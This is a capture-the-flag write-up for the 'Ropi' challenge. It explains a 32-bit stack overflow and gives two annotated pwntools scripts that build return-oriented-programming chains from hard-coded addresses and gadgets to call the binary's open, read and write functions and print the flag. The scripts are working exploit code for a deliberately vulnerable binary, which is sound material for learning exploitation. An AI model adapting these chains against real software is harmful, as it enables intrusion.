Ropi
This problem took me a few days and I was still unable to finish it, but then my senior helped me out.
This binary accepts a message that is read into a buffer, and yes, that read is vulnerable to an overflow! What you have to do is execute three functions, ret, ori and pro, which open, read and write the flag.
Yes, you have to do it with ROP (return-oriented programming).
from pwn import *
# Python 2 script (print statements, str concatenated with packed words),
# written against pwntools. It only builds the two payloads and prints them;
# it does not talk to the binary itself.
#
# What the chain depends on in the target, as far as this page shows: an
# unbounded read into a stack buffer (stated in the write-up) and code
# addresses that are the same on every run. Presumably the binary has no stack
# canary and is not position-independent - confirm with checksec.

# pack() uses the context word size, so every value below becomes a 4-byte
# word in the context's byte order (little-endian unless changed).
context.bits=32
# Addresses hard-coded from the challenge binary.
# ret, ori, pro: the three functions the write-up says must run in order.
ret=0x8048569
ori=0x80485c4
pro=0x804862c
# presumably a "pop; ret" gadget that steps over one argument word - verify
popret=0x8048395
# presumably a "pop; pop; ret" gadget that steps over two argument words - verify
pop2ret=0x80486ee
# address stage 1 finally returns to; presumably a point that reads input
# again, since a second payload follows - TODO confirm against the binary
ezy=0x0804852d
# not referenced anywhere in this script
rete=0x804837e
# Stage 1: 44 filler bytes, then four words laid out as
#   [ret] [popret] [0xBADBEEEF] [ezy]
# i.e. function address, the address it returns to, one argument word, and the
# next return address. 44 is presumably the distance from the start of the
# buffer to the saved return address - TODO confirm.
payload="A"*44+pack(ret)+pack(popret)+pack(0xBADBEEEF)+pack(ezy)
# Stage 2: same layout with two argument words for ori (stepped over by
# pop2ret) and pro as the last return address. The filler is 47 bytes here
# rather than 44; the page does not explain the difference.
payload2="B"*47+pack(ori)+pack(pop2ret)+pack(0xABCDEFFF)+pack(0x78563412)+pack(pro)
# Raw payloads go to stdout, each followed by the newline print adds.
print payload
print payload2
The script above works; all credit goes to my senior. I will also post my own payload, which works locally but not against the server. I don't know why, but I learnt one thing:
we can make everything in life much simpler than we think :)
from pwn import *
# Python 2 script (print statements, str concatenated with packed words),
# written against pwntools. The write-up reports that this version works
# against the local binary but not against the server.

# pack() uses the context word size, so every value below becomes a 4-byte
# word in the context's byte order (little-endian unless changed).
context.bits=32
# Addresses hard-coded from the challenge binary; they only hold if the binary
# loads at the same base on every run (presumably non-PIE - confirm with checksec).
# ret, ori, pro: the three functions the write-up says must run in order.
ret=0x8048569
ori=0x80485c4
# pro is only referenced by the commented-out payload3 below
pro=0x804862c
# presumably a "pop; ret" gadget that steps over one argument word - verify
popret=0x8048395
# presumably a "pop; pop; ret" gadget that steps over two argument words - verify
pop2ret=0x80486ee
# address stage 1 finally returns to; presumably a point that reads input
# again, since the script waits for a second prompt - TODO confirm
ezy=0x0804852d
# 0x12 bytes past pro, so this lands inside pro rather than at its entry
prop=0x0804863e
# not referenced anywhere in this script
rete=0x804837e
# Stage 1: 44 filler bytes, then [ret] [popret] [0xBADBEEEF] [ezy] -
# function address, the address it returns to, one argument word, next
# return address.
payload="A"*44+pack(ret)+pack(popret)+pack(0xBADBEEEF)+pack(ezy)
# Stage 2: [ori] [pop2ret] [two argument words] [prop].
# NOTE(review): compared with the script the write-up reports as working, this
# line differs in two places - 44 "A" filler bytes instead of 47 "B", and prop
# instead of pro as the last address. The page does not say which of these
# matters.
payload2="A"*44+pack(ori)+pack(pop2ret)+pack(0xABCDEFFF)+pack(0x78563412)+pack(prop)
# Disabled third stage, kept by the author; it is never sent.
#payload3="A"*44+pack(ret)+pack(popret)+pack(0xBADBEEEF)+pack(pro)
# binary starts
# Runs the local copy of the challenge binary; the remote endpoint is left
# commented out.
p=process('ropi')
#p=remote('ropi.vuln.icec.tf',6500)
# Wait for the prompt (text ending in "?" and a newline) before each send.
msg=p.recvuntil('?\n')
print msg
p.sendline(payload) # stage 1, sent at the first prompt (author's note: first read through main)
msg=p.recvuntil('?\n')
print msg
p.sendline(payload2)
# The string literal below is the author's way of disabling the third
# exchange; as a bare string statement it has no effect.
"""msg=p.recvuntil('?\n')
print msg+" read by exploit 2"
p.sendline(payload3)"""
# Read everything the process writes until it closes its output.
msg=p.recvall()
print msg